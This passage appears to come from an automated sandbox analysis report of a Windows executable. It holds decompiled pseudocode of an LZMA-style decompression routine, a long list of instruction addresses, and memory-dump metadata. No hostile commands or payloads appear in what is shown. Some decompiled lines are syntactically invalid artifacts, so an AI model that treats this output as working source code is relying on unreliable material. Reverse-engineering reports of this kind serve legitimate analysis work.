														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                                                                    0x00000000
                                                                                    0x00406767
                                                                                    0x00406767
                                                                                    0x0040676b
                                                                                    0x00406790
                                                                                    0x0040679a
                                                                                    0x00000000
                                                                                    0x0040676d
                                                                                    0x0040676d
                                                                                    0x00406770
                                                                                    0x00406774
                                                                                    0x00406777
                                                                                    0x0040677a
                                                                                    0x0040677e
                                                                                    0x0040677e
                                                                                    0x00406781
                                                                                    0x0040685b
                                                                                    0x0040685b
                                                                                    0x00406862
                                                                                    0x00406862
                                                                                    0x00406865
                                                                                    0x0040686c
                                                                                    0x00406899
                                                                                    0x0040689d
                                                                                    0x004068fd
                                                                                    0x00406900
                                                                                    0x00406905
                                                                                    0x00406906
                                                                                    0x00406908
                                                                                    0x0040690a
                                                                                    0x0040690d
                                                                                    0x00406819
                                                                                    0x00406819
                                                                                    0x00406819
                                                                                    0x00405fb5
                                                                                    0x00405fb5
                                                                                    0x00405fb5
                                                                                    0x00405fbe
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405fc4
                                                                                    0x00000000
                                                                                    0x00405fcf
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405fd8
                                                                                    0x00405fdb
                                                                                    0x00405fde
                                                                                    0x00405fe2
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405fe8
                                                                                    0x00405feb
                                                                                    0x00405fed
                                                                                    0x00405fee
                                                                                    0x00405ff1
                                                                                    0x00405ff3
                                                                                    0x00405ff4
                                                                                    0x00405ff6
                                                                                    0x00405ff9
                                                                                    0x00405ffe
                                                                                    0x00406003
                                                                                    0x0040600c
                                                                                    0x0040601f
                                                                                    0x00406022
                                                                                    0x0040602e
                                                                                    0x00406056
                                                                                    0x00406058
                                                                                    0x00406066
                                                                                    0x00406066
                                                                                    0x0040606a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040605a
                                                                                    0x0040605a
                                                                                    0x0040605d
                                                                                    0x0040605e
                                                                                    0x0040605e
                                                                                    0x00000000
                                                                                    0x0040605a
                                                                                    0x00406034
                                                                                    0x00406039
                                                                                    0x00406039
                                                                                    0x00406042
                                                                                    0x0040604a
                                                                                    0x0040604d
                                                                                    0x00000000
                                                                                    0x00406053
                                                                                    0x00406053
                                                                                    0x00000000
                                                                                    0x00406053
                                                                                    0x00000000
                                                                                    0x00406070
                                                                                    0x00406070
                                                                                    0x00406074
                                                                                    0x00406920
                                                                                    0x00000000
                                                                                    0x00406920
                                                                                    0x0040607d
                                                                                    0x0040608d
                                                                                    0x00406090
                                                                                    0x00406093
                                                                                    0x00406093
                                                                                    0x00406093
                                                                                    0x00406096
                                                                                    0x0040609a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040609c
                                                                                    0x004060a2
                                                                                    0x004060cc
                                                                                    0x004060d2
                                                                                    0x004060d9
                                                                                    0x00000000
                                                                                    0x004060d9
                                                                                    0x004060a8
                                                                                    0x004060ab
                                                                                    0x004060b0
                                                                                    0x004060b0
                                                                                    0x004060bb
                                                                                    0x004060c3
                                                                                    0x004060c6
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040610b
                                                                                    0x00406111
                                                                                    0x00406114
                                                                                    0x00406121
                                                                                    0x00406129
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004060e0
                                                                                    0x004060e0
                                                                                    0x004060e4
                                                                                    0x0040692f
                                                                                    0x00000000
                                                                                    0x0040692f
                                                                                    0x004060f0
                                                                                    0x004060fb
                                                                                    0x004060fb
                                                                                    0x004060fb
                                                                                    0x004060fe
                                                                                    0x00406101
                                                                                    0x00406104
                                                                                    0x00406109
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004067a0
                                                                                    0x004067a0
                                                                                    0x004067a6
                                                                                    0x004067ac
                                                                                    0x004067b2
                                                                                    0x004067cc
                                                                                    0x004067cf
                                                                                    0x004067d5
                                                                                    0x004067e0
                                                                                    0x004067e0
                                                                                    0x004067e2
                                                                                    0x004067b4
                                                                                    0x004067b4
                                                                                    0x004067c3
                                                                                    0x004067c7
                                                                                    0x004067c7
                                                                                    0x004067ec
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004067ee
                                                                                    0x004067f2
                                                                                    0x004069a1
                                                                                    0x00000000
                                                                                    0x004069a1
                                                                                    0x004067fe
                                                                                    0x00406805
                                                                                    0x0040680d
                                                                                    0x00406810
                                                                                    0x00406813
                                                                                    0x00406813
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406131
                                                                                    0x00406133
                                                                                    0x00406136
                                                                                    0x004061a7
                                                                                    0x004061aa
                                                                                    0x004061ad
                                                                                    0x004061b4
                                                                                    0x004061be
                                                                                    0x00000000
                                                                                    0x004061be
                                                                                    0x00406138
                                                                                    0x0040613c
                                                                                    0x0040613f
                                                                                    0x00406141
                                                                                    0x00406144
                                                                                    0x00406147
                                                                                    0x00406149
                                                                                    0x0040614c
                                                                                    0x0040614e
                                                                                    0x00406153
                                                                                    0x00406156
                                                                                    0x00406159
                                                                                    0x0040615d
                                                                                    0x00406164
                                                                                    0x00406167
                                                                                    0x0040616e
                                                                                    0x00406172
                                                                                    0x0040617a
                                                                                    0x0040617a
                                                                                    0x0040617a
                                                                                    0x00406174
                                                                                    0x00406174
                                                                                    0x00406174
                                                                                    0x00406169
                                                                                    0x00406169
                                                                                    0x00406169
                                                                                    0x0040617e
                                                                                    0x00406181
                                                                                    0x0040619f
                                                                                    0x004061a1
                                                                                    0x00000000
                                                                                    0x00406183
                                                                                    0x00406183
                                                                                    0x00406186
                                                                                    0x00406189
                                                                                    0x0040618c
                                                                                    0x0040618e
                                                                                    0x0040618e
                                                                                    0x0040618e
                                                                                    0x00406191
                                                                                    0x00406194
                                                                                    0x00406196
                                                                                    0x00406197
                                                                                    0x0040619a
                                                                                    0x00000000
                                                                                    0x0040619a
                                                                                    0x00000000
                                                                                    0x004063d0
                                                                                    0x004063d4
                                                                                    0x004063f2
                                                                                    0x004063f5
                                                                                    0x004063fc
                                                                                    0x004063ff
                                                                                    0x00406402
                                                                                    0x00406405
                                                                                    0x00406408
                                                                                    0x0040640b
                                                                                    0x0040640d
                                                                                    0x00406414
                                                                                    0x00406415
                                                                                    0x00406417
                                                                                    0x0040641a
                                                                                    0x0040641d
                                                                                    0x00406420
                                                                                    0x00406420
                                                                                    0x00406425
                                                                                    0x00000000
                                                                                    0x00406425
                                                                                    0x004063d6
                                                                                    0x004063d9
                                                                                    0x004063dc
                                                                                    0x004063e6
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040643a
                                                                                    0x0040643e
                                                                                    0x00406461
                                                                                    0x00406464
                                                                                    0x00406467
                                                                                    0x00406471
                                                                                    0x00406440
                                                                                    0x00406440
                                                                                    0x00406443
                                                                                    0x00406446
                                                                                    0x00406449
                                                                                    0x00406456
                                                                                    0x00406459
                                                                                    0x00406459
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040647d
                                                                                    0x00406481
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406487
                                                                                    0x0040648b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406491
                                                                                    0x00406493
                                                                                    0x00406497
                                                                                    0x00406497
                                                                                    0x0040649a
                                                                                    0x0040649e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004064ee
                                                                                    0x004064f2
                                                                                    0x004064f9
                                                                                    0x004064fc
                                                                                    0x004064ff
                                                                                    0x00406509
                                                                                    0x00000000
                                                                                    0x00406509
                                                                                    0x004064f4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406515
                                                                                    0x00406519
                                                                                    0x00406520
                                                                                    0x00406523
                                                                                    0x00406526
                                                                                    0x0040651b
                                                                                    0x0040651b
                                                                                    0x0040651b
                                                                                    0x00406529
                                                                                    0x0040652c
                                                                                    0x0040652f
                                                                                    0x0040652f
                                                                                    0x00406532
                                                                                    0x00406535
                                                                                    0x00406538
                                                                                    0x00406538
                                                                                    0x0040653b
                                                                                    0x00406542
                                                                                    0x00406547
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004065d5
                                                                                    0x004065d5
                                                                                    0x004065d9
                                                                                    0x00406977
                                                                                    0x00000000
                                                                                    0x00406977
                                                                                    0x004065df
                                                                                    0x004065e2
                                                                                    0x004065e5
                                                                                    0x004065e9
                                                                                    0x004065ec
                                                                                    0x004065f2
                                                                                    0x004065f4
                                                                                    0x004065f4
                                                                                    0x004065f4
                                                                                    0x004065f7
                                                                                    0x004065fa
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004061ca
                                                                                    0x004061ca
                                                                                    0x004061ce
                                                                                    0x0040693b
                                                                                    0x00000000
                                                                                    0x0040693b
                                                                                    0x004061d4
                                                                                    0x004061d7
                                                                                    0x004061da
                                                                                    0x004061de
                                                                                    0x004061e1
                                                                                    0x004061e7
                                                                                    0x004061e9
                                                                                    0x004061e9
                                                                                    0x004061e9
                                                                                    0x004061ec
                                                                                    0x004061ef
                                                                                    0x004061ef
                                                                                    0x004061f2
                                                                                    0x004061f5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004061fb
                                                                                    0x00406201
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406207
                                                                                    0x00406207
                                                                                    0x0040620b
                                                                                    0x0040620e
                                                                                    0x00406211
                                                                                    0x00406214
                                                                                    0x00406217
                                                                                    0x00406218
                                                                                    0x0040621b
                                                                                    0x0040621d
                                                                                    0x00406223
                                                                                    0x00406226
                                                                                    0x00406229
                                                                                    0x0040622c
                                                                                    0x0040622f
                                                                                    0x00406232
                                                                                    0x00406235
                                                                                    0x00406251
                                                                                    0x00406254
                                                                                    0x00406257
                                                                                    0x0040625a
                                                                                    0x00406261
                                                                                    0x00406265
                                                                                    0x00406267
                                                                                    0x0040626b
                                                                                    0x00406237
                                                                                    0x00406237
                                                                                    0x0040623b
                                                                                    0x00406243
                                                                                    0x00406248
                                                                                    0x0040624a
                                                                                    0x0040624c
                                                                                    0x0040624c
                                                                                    0x0040626e
                                                                                    0x00406275
                                                                                    0x00406278
                                                                                    0x00000000
                                                                                    0x0040627e
                                                                                    0x00000000
                                                                                    0x0040627e
                                                                                    0x00000000
                                                                                    0x00406283
                                                                                    0x00406283
                                                                                    0x00406287
                                                                                    0x00406947
                                                                                    0x00000000
                                                                                    0x00406947
                                                                                    0x0040628d
                                                                                    0x00406290
                                                                                    0x00406293
                                                                                    0x00406297
                                                                                    0x0040629a
                                                                                    0x004062a0
                                                                                    0x004062a2
                                                                                    0x004062a2
                                                                                    0x004062a2
                                                                                    0x004062a5
                                                                                    0x004062a8
                                                                                    0x004062a8
                                                                                    0x004062a8
                                                                                    0x004062ae
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004062b0
                                                                                    0x004062b3
                                                                                    0x004062b6
                                                                                    0x004062b9
                                                                                    0x004062bc
                                                                                    0x004062bf
                                                                                    0x004062c2
                                                                                    0x004062c5
                                                                                    0x004062c8
                                                                                    0x004062cb
                                                                                    0x004062ce
                                                                                    0x004062e6
                                                                                    0x004062e9
                                                                                    0x004062ec
                                                                                    0x004062ef
                                                                                    0x004062ef
                                                                                    0x004062f2
                                                                                    0x004062f6
                                                                                    0x004062f8
                                                                                    0x004062d0
                                                                                    0x004062d0
                                                                                    0x004062d8
                                                                                    0x004062dd
                                                                                    0x004062df
                                                                                    0x004062e1
                                                                                    0x004062e1
                                                                                    0x004062fb
                                                                                    0x00406302
                                                                                    0x00406305
                                                                                    0x00000000
                                                                                    0x00406307
                                                                                    0x00000000
                                                                                    0x00406307
                                                                                    0x00406305
                                                                                    0x0040630c
                                                                                    0x0040630c
                                                                                    0x0040630c
                                                                                    0x0040630c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406347
                                                                                    0x00406347
                                                                                    0x0040634b
                                                                                    0x00406953
                                                                                    0x00000000
                                                                                    0x00406953
                                                                                    0x00406351
                                                                                    0x00406354
                                                                                    0x00406357
                                                                                    0x0040635b
                                                                                    0x0040635e
                                                                                    0x00406364
                                                                                    0x00406366
                                                                                    0x00406366
                                                                                    0x00406366
                                                                                    0x00406369
                                                                                    0x0040636c
                                                                                    0x0040636c
                                                                                    0x00406372
                                                                                    0x00406310
                                                                                    0x00406310
                                                                                    0x00406313
                                                                                    0x00000000
                                                                                    0x00406313
                                                                                    0x00406374
                                                                                    0x00406374
                                                                                    0x00406377
                                                                                    0x0040637a
                                                                                    0x0040637d
                                                                                    0x00406380
                                                                                    0x00406383
                                                                                    0x00406386
                                                                                    0x00406389
                                                                                    0x0040638c
                                                                                    0x0040638f
                                                                                    0x00406392
                                                                                    0x004063aa
                                                                                    0x004063ad
                                                                                    0x004063b0
                                                                                    0x004063b3
                                                                                    0x004063b3
                                                                                    0x004063b6
                                                                                    0x004063ba
                                                                                    0x004063bc
                                                                                    0x00406394
                                                                                    0x00406394
                                                                                    0x0040639c
                                                                                    0x004063a1
                                                                                    0x004063a3
                                                                                    0x004063a5
                                                                                    0x004063a5
                                                                                    0x004063bf
                                                                                    0x004063c6
                                                                                    0x004063c9
                                                                                    0x00000000
                                                                                    0x004063cb
                                                                                    0x00000000
                                                                                    0x004063cb
                                                                                    0x00000000
                                                                                    0x00406658
                                                                                    0x00406658
                                                                                    0x0040665c
                                                                                    0x00406983
                                                                                    0x00000000
                                                                                    0x00406983
                                                                                    0x00406662
                                                                                    0x00406665
                                                                                    0x00406668
                                                                                    0x0040666c
                                                                                    0x0040666f
                                                                                    0x00406675
                                                                                    0x00406677
                                                                                    0x00406677
                                                                                    0x00406677
                                                                                    0x0040667a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406428
                                                                                    0x00406428
                                                                                    0x0040642b
                                                                                    0x0040679d
                                                                                    0x0040679d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406824
                                                                                    0x00406828
                                                                                    0x00406846
                                                                                    0x00406846
                                                                                    0x00406846
                                                                                    0x0040684d
                                                                                    0x00406854
                                                                                    0x00000000
                                                                                    0x00406854
                                                                                    0x0040682a
                                                                                    0x0040682d
                                                                                    0x00406830
                                                                                    0x00406833
                                                                                    0x0040683a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406915
                                                                                    0x00406918
                                                                                    0x00406819
                                                                                    0x00406819
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040654f
                                                                                    0x00406551
                                                                                    0x00406558
                                                                                    0x00406559
                                                                                    0x0040655b
                                                                                    0x0040655e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406566
                                                                                    0x00406569
                                                                                    0x0040656c
                                                                                    0x0040656e
                                                                                    0x00406570
                                                                                    0x00406570
                                                                                    0x00406571
                                                                                    0x00406574
                                                                                    0x0040657b
                                                                                    0x0040657e
                                                                                    0x0040658c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406871
                                                                                    0x00406871
                                                                                    0x00406875
                                                                                    0x004069ad
                                                                                    0x00000000
                                                                                    0x004069ad
                                                                                    0x0040687b
                                                                                    0x0040687e
                                                                                    0x00406881
                                                                                    0x00406885
                                                                                    0x00406888
                                                                                    0x0040688e
                                                                                    0x00406890
                                                                                    0x00406890
                                                                                    0x00406890
                                                                                    0x00406893
                                                                                    0x00406896
                                                                                    0x00406896
                                                                                    0x00406896
                                                                                    0x00406896
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406594
                                                                                    0x00406597
                                                                                    0x004065cd
                                                                                    0x004066fd
                                                                                    0x004066fd
                                                                                    0x004066fd
                                                                                    0x004066fd
                                                                                    0x00406700
                                                                                    0x00406700
                                                                                    0x00406703
                                                                                    0x00406705
                                                                                    0x0040698f
                                                                                    0x00000000
                                                                                    0x0040698f
                                                                                    0x0040670b
                                                                                    0x0040670e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406714
                                                                                    0x00406718
                                                                                    0x0040671b
                                                                                    0x0040671b
                                                                                    0x0040671b
                                                                                    0x00000000
                                                                                    0x0040671b
                                                                                    0x00406599
                                                                                    0x0040659b
                                                                                    0x0040659d
                                                                                    0x0040659f
                                                                                    0x004065a2
                                                                                    0x004065a3
                                                                                    0x004065a5
                                                                                    0x004065a7
                                                                                    0x004065aa
                                                                                    0x004065ad
                                                                                    0x004065c3
                                                                                    0x004065c8
                                                                                    0x00406600
                                                                                    0x00406600
                                                                                    0x00406604
                                                                                    0x00406630
                                                                                    0x00406632
                                                                                    0x00406639
                                                                                    0x0040663c
                                                                                    0x0040663f
                                                                                    0x0040663f
                                                                                    0x00406644
                                                                                    0x00406644
                                                                                    0x00406646
                                                                                    0x00406649
                                                                                    0x00406650
                                                                                    0x00406653
                                                                                    0x00406680
                                                                                    0x00406680
                                                                                    0x00406683
                                                                                    0x00406686
                                                                                    0x004066fa
                                                                                    0x004066fa
                                                                                    0x004066fa
                                                                                    0x00000000
                                                                                    0x004066fa
                                                                                    0x00406688
                                                                                    0x0040668e
                                                                                    0x00406691
                                                                                    0x00406694
                                                                                    0x00406697
                                                                                    0x0040669a
                                                                                    0x0040669d
                                                                                    0x004066a0
                                                                                    0x004066a3
                                                                                    0x004066a6
                                                                                    0x004066a9
                                                                                    0x004066c2
                                                                                    0x004066c4
                                                                                    0x004066c7
                                                                                    0x004066c8
                                                                                    0x004066cb
                                                                                    0x004066cd
                                                                                    0x004066d0
                                                                                    0x004066d2
                                                                                    0x004066d4
                                                                                    0x004066d7
                                                                                    0x004066d9
                                                                                    0x004066dc
                                                                                    0x004066e0
                                                                                    0x004066e2
                                                                                    0x004066e2
                                                                                    0x004066e3
                                                                                    0x004066e6
                                                                                    0x004066e9
                                                                                    0x004066ab
                                                                                    0x004066ab
                                                                                    0x004066b3
                                                                                    0x004066b8
                                                                                    0x004066ba
                                                                                    0x004066bd
                                                                                    0x004066bd
                                                                                    0x004066ec
                                                                                    0x004066f3
                                                                                    0x0040667d
                                                                                    0x0040667d
                                                                                    0x0040667d
                                                                                    0x0040667d
                                                                                    0x00000000
                                                                                    0x004066f5
                                                                                    0x00000000
                                                                                    0x004066f5
                                                                                    0x004066f3
                                                                                    0x00406606
                                                                                    0x00406609
                                                                                    0x0040660b
                                                                                    0x0040660e
                                                                                    0x00406611
                                                                                    0x00406614
                                                                                    0x00406616
                                                                                    0x00406619
                                                                                    0x0040661c
                                                                                    0x0040661c
                                                                                    0x0040661f
                                                                                    0x0040661f
                                                                                    0x00406622
                                                                                    0x00406629
                                                                                    0x004065fd
                                                                                    0x004065fd
                                                                                    0x004065fd
                                                                                    0x004065fd
                                                                                    0x00000000
                                                                                    0x0040662b
                                                                                    0x00000000
                                                                                    0x0040662b
                                                                                    0x00406629
                                                                                    0x004065af
                                                                                    0x004065b2
                                                                                    0x004065b4
                                                                                    0x004065b7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406316
                                                                                    0x00406316
                                                                                    0x0040631a
                                                                                    0x0040695f
                                                                                    0x00000000
                                                                                    0x0040695f
                                                                                    0x00406320
                                                                                    0x00406323
                                                                                    0x00406326
                                                                                    0x00406329
                                                                                    0x0040632c
                                                                                    0x0040632f
                                                                                    0x00406332
                                                                                    0x00406334
                                                                                    0x00406337
                                                                                    0x0040633a
                                                                                    0x0040633d
                                                                                    0x0040633f
                                                                                    0x0040633f
                                                                                    0x0040633f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004064a1
                                                                                    0x004064a1
                                                                                    0x004064a5
                                                                                    0x0040696b
                                                                                    0x00000000
                                                                                    0x0040696b
                                                                                    0x004064ab
                                                                                    0x004064ae
                                                                                    0x004064b1
                                                                                    0x004064b4
                                                                                    0x004064b6
                                                                                    0x004064b6
                                                                                    0x004064b6
                                                                                    0x004064b9
                                                                                    0x004064bc
                                                                                    0x004064bf
                                                                                    0x004064c2
                                                                                    0x004064c5
                                                                                    0x004064c8
                                                                                    0x004064c9
                                                                                    0x004064cb
                                                                                    0x004064cb
                                                                                    0x004064cb
                                                                                    0x004064ce
                                                                                    0x004064d1
                                                                                    0x004064d4
                                                                                    0x004064d7
                                                                                    0x004064d7
                                                                                    0x004064d7
                                                                                    0x004064da
                                                                                    0x004064dc
                                                                                    0x004064dc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040671e
                                                                                    0x0040671e
                                                                                    0x0040671e
                                                                                    0x00406722
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406728
                                                                                    0x0040672b
                                                                                    0x0040672e
                                                                                    0x00406731
                                                                                    0x00406733
                                                                                    0x00406733
                                                                                    0x00406733
                                                                                    0x00406736
                                                                                    0x00406739
                                                                                    0x0040673c
                                                                                    0x0040673f
                                                                                    0x00406742
                                                                                    0x00406745
                                                                                    0x00406746
                                                                                    0x00406748
                                                                                    0x00406748
                                                                                    0x00406748
                                                                                    0x0040674b
                                                                                    0x0040674e
                                                                                    0x00406751
                                                                                    0x00406754
                                                                                    0x00406757
                                                                                    0x0040675b
                                                                                    0x0040675d
                                                                                    0x00406760
                                                                                    0x00000000
                                                                                    0x00406762
                                                                                    0x004064df
                                                                                    0x004064df
                                                                                    0x00000000
                                                                                    0x004064df
                                                                                    0x00406760
                                                                                    0x00406995
                                                                                    0x004069b7
                                                                                    0x004069bd
                                                                                    0x004069bf
                                                                                    0x004069c6
                                                                                    0x004069c8
                                                                                    0x004069cf
                                                                                    0x004069d3
                                                                                    0x00000000
                                                                                    0x00405fc4
                                                                                    0x004069cc
                                                                                    0x004069cc
                                                                                    0x00000000
                                                                                    0x004069cc
                                                                                    0x00406819
                                                                                    0x0040689f
                                                                                    0x004068a5
                                                                                    0x004068a8
                                                                                    0x004068ab
                                                                                    0x004068ae
                                                                                    0x004068b1
                                                                                    0x004068b4
                                                                                    0x004068b7
                                                                                    0x004068ba
                                                                                    0x004068c0
                                                                                    0x004068d9
                                                                                    0x004068dc
                                                                                    0x004068df
                                                                                    0x004068e2
                                                                                    0x004068e6
                                                                                    0x004068e8
                                                                                    0x004068e9
                                                                                    0x004068ec
                                                                                    0x004068c2
                                                                                    0x004068c2
                                                                                    0x004068ca
                                                                                    0x004068cf
                                                                                    0x004068d1
                                                                                    0x004068d4
                                                                                    0x004068d4
                                                                                    0x004068f6
                                                                                    0x00000000
                                                                                    0x004068f8
                                                                                    0x00000000
                                                                                    0x004068f8
                                                                                    0x004068f6
                                                                                    0x00000000
                                                                                    0x0040676b

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d0b545a720d06a2780d8eb9310de1c164ea8e259f40aa19cdef3f662a7789f4d
